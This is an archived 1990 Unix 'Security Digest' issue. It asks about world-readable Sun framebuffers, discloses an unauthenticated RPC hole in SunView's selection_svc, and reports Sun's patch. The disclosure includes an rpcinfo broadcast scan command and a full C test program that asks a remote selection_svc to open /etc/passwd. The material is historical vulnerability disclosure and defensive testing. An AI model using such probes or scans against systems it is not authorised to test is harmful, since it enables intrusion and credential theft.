The 'Security Digest' Archives (TM)

Archive: About | Browse | Search | Contributions | Feedback
Site: Help | Index | Search | Contact | Notices | Changes

ARCHIVE: Zardoz 'Security Digest' - Archives (1989 - 1991)
DOCUMENT: Zardoz 'Security Digest' V2 #15 1990-05-30 (1 file, 3885 bytes)
SOURCE: http://securitydigest.org/exec/display?f=zardoz/archive/215.txt&t=text/plain
NOTICE: securitydigest.org recognises the rights of all third-party works.

START OF DOCUMENT


Security Digest Volume 2 Issue 15

subject(s):

            /dev/fb and security
            security problem in selection_svc
            Patch available for security problem in selection_svc

The unix security mailing list is by invitation only and contains
sensitive material which SHOULD NOT BE REVEALED to non-members.
DO NOT PUT ANY LIST CONTENTS IN LOCATIONS ACCESSABLE TO NON-MEMBERS.
If you must keep copies on-line, please encrypt them at the very least.

PLEASE POST TO:                              security@uninet.cpd.com
PLEASE SEND EMERGENCY ALERTS TO:   security-emergency@uninet.cpd.com
PLEASE SEND REQUESTS TO:             security-request@uninet.cpd.com

Postings that describe security holes/fixes have a * in their subject.


------------------------------------------------------------------------

Date: Wed, 30 May 90 16:10:26 EDT
From: Ed Anselmo <uunet!CS.YALE.EDU!anselmo-ed>
Subject: /dev/fb and security

Several users here are concerned about screenbuffers which are world
readable.  And sure enough, on our Suns, you can do a screendump and
save the current screen image to a rasterfile, and then either print
out the file, or better yet, put the rasterfile up on your own screen.
You won't get passwords this way, but it's akin to standing behind a
user and reading over his/her shoulder.  On Suns you don't even have
to be in a window system.

Has anyone addressed this issue?  We've tossed around the idea of
writing a set-uid program to chown the device files to the user logged
in on the console ala login and ttys, but aren't sure if anything will
break.

------------------------------------------------------------------------

Date: Wed, 20 Jun 90 17:27:53 PDT
From: uunet!mica.berkeley.edu!shipley
Subject: security problem in selection_svc

Under SunOS running the SunView windowing system, it is possible to
remotely access files using SunView selection_svc(1) subprocess and the
RPC facility.

The selection_svc program handles all selections made by SunView client
programs.  It is used to modify resource files and cut/paste
selections.  The way these clients communicate with selection_svc is
through RPC calls.  The problem is that the selection service process
will accept RPC requests from any user, both locally and remotely.  No
authentication is preformed.

I have verified this bug under SunOS 3.5, 4.0.3 and 4.1

I have mailed a patch to Sun that will fix the remote access problem by
having the selection_svc deny remote requests (with an exception for
call to RPC's "NULLPROC").

But this patch only shrinks the security hole because any users on the
same cpu can still read files as if they were the user running
SunView.

What's worse it that it is possible to scan for local systems having
the RPC service available.  The command:

    rpcinfo -b selection_svc 6

will print a list of systems running selection_svc on the local
broadcast network.

For Sun's 386i systems, the problem is more complicated.  On these
systems, selection_svc is started when /etc/init runs /etc/rc.  Because
init runs as root, you tell selection_svc to read any file.

Until patch is released by Sun the only real fix I know of is to
disable suntools and use the X11 windowing system.

Here is a program that will test for this problem:
(administer need not worry about this code, it will take
another 300 lines of added code to make this program
retrieve data from a remote host)


static char *_cp_="Copyright Peter Shipley (HACKMAN) [1990]\n";
static char *_n_=" sel_holdf_rpc.c \n";

/*
 * This  program tests the existence of a hole in the selection_svc
 * that allows remote access to file on a system.
 *
 * The Return codes are:
 *  1 = security problem detected
 *  0 = no security problem detected
 * -1 = Insufficient data or error in detection
 *
 */

#include <stdio.h>
#include <rpc/rpc.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/param.h>
#include <netdb.h>


typedef enum    {
    SELN_UNKNOWN, SELN_CARET, SELN_PRIMARY,
    SELN_SECONDARY, SELN_SHELF, SELN_UNSPECIFIED
} Seln_rank;

typedef enum    {
    SELN_FAILED, SELN_SUCCESS,
    SELN_NON_EXIST, SELN_DIDNT_HAVE, SELN_WRONG_RANK,
    SELN_CONTINUED, SELN_CANCEL, SELN_UNRECOGNIZED
} Seln_result;

typedef struct {
    Seln_rank           rank;
    char               *pathname;
} Seln_file_info;

#define SELN_SVC_DONE   ((u_long) 3)
#define SELN_SVC_HOLD_FILE      ((u_long) 5)
#define SEL_PRO_NUM     ((u_long) 100015)    /*536970927*/
#define SEL_VERSION     ((u_long) 6)


int xdr_sfi();
enum clnt_stat  call_nullproc(),
call_holdfile();

CLIENT  *make_client();
static struct timeval tout;
void    exit(); /* SHUT LINT UP */

/* ARGUSED */
main(ac, av)
int ac;
char *av[];
{
CLIENT  *client;
enum clnt_stat  clnt_stat;
Seln_result     sr;
int     result;

    result = 0;

    /* establish a link since we will be using it more then once */
    client = make_client(
(ac > 1 ? av[1] : "localhost" ),
SEL_PRO_NUM, SEL_VERSION);

    /* test it */
    if(client == NULL) {
clnt_pcreateerror("clntudp_create");
exit(-1);
    }

    /* call the null procedure, this will serve as sort of a ping */
    clnt_stat = call_nullproc(client);

    /* test and report results */
    if( clnt_stat  != RPC_SUCCESS) {
clnt_perror(client, "rpc: nullproc");
exit(-1);
    } else
(void) fputs("RPC: Success nullproc\n", stdout);

    /* call the hold file procedure, this will ask the selection
       server to open the file for reading. */
    clnt_stat = call_holdfile(client, "/etc/passwd", &sr);

    /* test and report results */
    if( clnt_stat  != RPC_SUCCESS ) {
clnt_perror(client, "rpc: holdfile");
(void) fputs("RPC: failure holdfile\n", stdout);
exit(-1);
    } else {
(void) fputs("RPC: Success holdfile\n", stdout);
switch(sr) {
    case SELN_FAILED:
(void) fputs("selection failure holdfile\n", stdout);
break;
    case SELN_SUCCESS:
(void) fputs("selection success holdfile\n", stdout);
result = 1;
break;
    default:
(void) fprintf(stderr, "selection result = %d\n", sr);
}
    }

    /* close our connection */
    clnt_destroy(client);

    /* bye bye */
    exit(result);
}

enum clnt_stat
call_holdfile(client, path, sr)
CLIENT *client;
char *path;
Seln_result     *sr;
{
Seln_file_info sfi;

    /* set up request data */
    sfi.rank = SELN_SECONDARY;
    sfi.pathname = path;

    /* make request and return result */
    return(clnt_call(client, SELN_SVC_HOLD_FILE,
    xdr_sfi, (char *) &sfi,     /* data sent */
    xdr_enum, (char *) sr,      /* data returned */
    tout));
}

CLIENT *
make_client(host, serv, ver)
char *host;
u_long  serv, ver;
{
CLIENT  *client;
int sock = RPC_ANYSOCK;
struct hostent *hp;
struct sockaddr_in server_addr;

    /* get address of remote host */
    if ((hp = gethostbyname(host)) == NULL) {
(void) fprintf(stderr, "Can't get address for %s\n", host);
exit(-1);
    }

    /* set our connection timeout */
    tout.tv_sec = 3;
    tout.tv_usec = 0;

    /* set up out data structures for connecting with the remote host */
    bcopy((char *)hp->h_addr, (char *) &server_addr.sin_addr, hp->h_length);

    server_addr.sin_family = AF_INET;
    server_addr.sin_port = 0;


    /* create a client hookup using udp  to selection_svc */
    client = clntudp_create(&server_addr, serv, ver,
    tout, &sock);

    /* set the time out for calls (since tout is reused) */
    tout.tv_sec = 20;

    /* return our referance hook for out client */
    return(client);
}


enum clnt_stat
call_nullproc(client)
CLIENT *client;
{
    return (clnt_call(client, NULLPROC,
    xdr_void, (char *) NULL,    /* data sent */
    xdr_void, (char *) NULL,    /* data returned */
    tout));
}

int xdr_sfi(xdr, xsfi)
XDR     *xdr;
Seln_file_info *xsfi;
{
    return (( xdr_int(xdr, (int *) &xsfi->rank) &&
   xdr_string(xdr, &xsfi->pathname, MAXPATHLEN)) );
}
/* end of file sel_holdf_rpc.c */

------------------------------------------------------------------------

Date: Mon, 2 Jul 90 13:06:12 PDT
From: neil (Neil Gorsuch)
Subject: Patch available for security problem in selection_svc

[ I received this from a sun security mailing list. - neil ]

On Jun 29,  1:41pm,  Sun Security Mailbox wrote:
} The selection_svc bug that has appeared on the network recently has
} been fixed.  For more details, see the posting below.
}
} To obtain the patch, please call your local Sun Answer Center
} (in the USA, it's 1-800-USA-4SUN), and ask for patch number: 100085-01.
} You can also reference Sun Bug ID: 1039576.
}
} The patch is available for SunOS 4.0.3 and SunOS 4.1, on Sun3 and Sun4
} architectures.
}
} All questions can be sent to security@ubu2.sun.com.
}
} -Beverly Ulbrich
} Product Manager, Sun Software Security

--
Neil Gorsuch     INTERNET: neil@uninet.cpd.com      UUCP: uunet!zardoz!neil
MAIL: 1209 E. Warner, Santa Ana, CA, USA, 92705     PHONE: +1 714 546 1100
Uninet, a division of Custom Product Design, Inc.   FAX: +1 714 546 3726
AKA: root, security-request, uuasc-request, postmaster, usenet, news

------------------------------------------------------------------------

        End of Security Digest Volume 2 Issue 15
        **********************

END OF DOCUMENT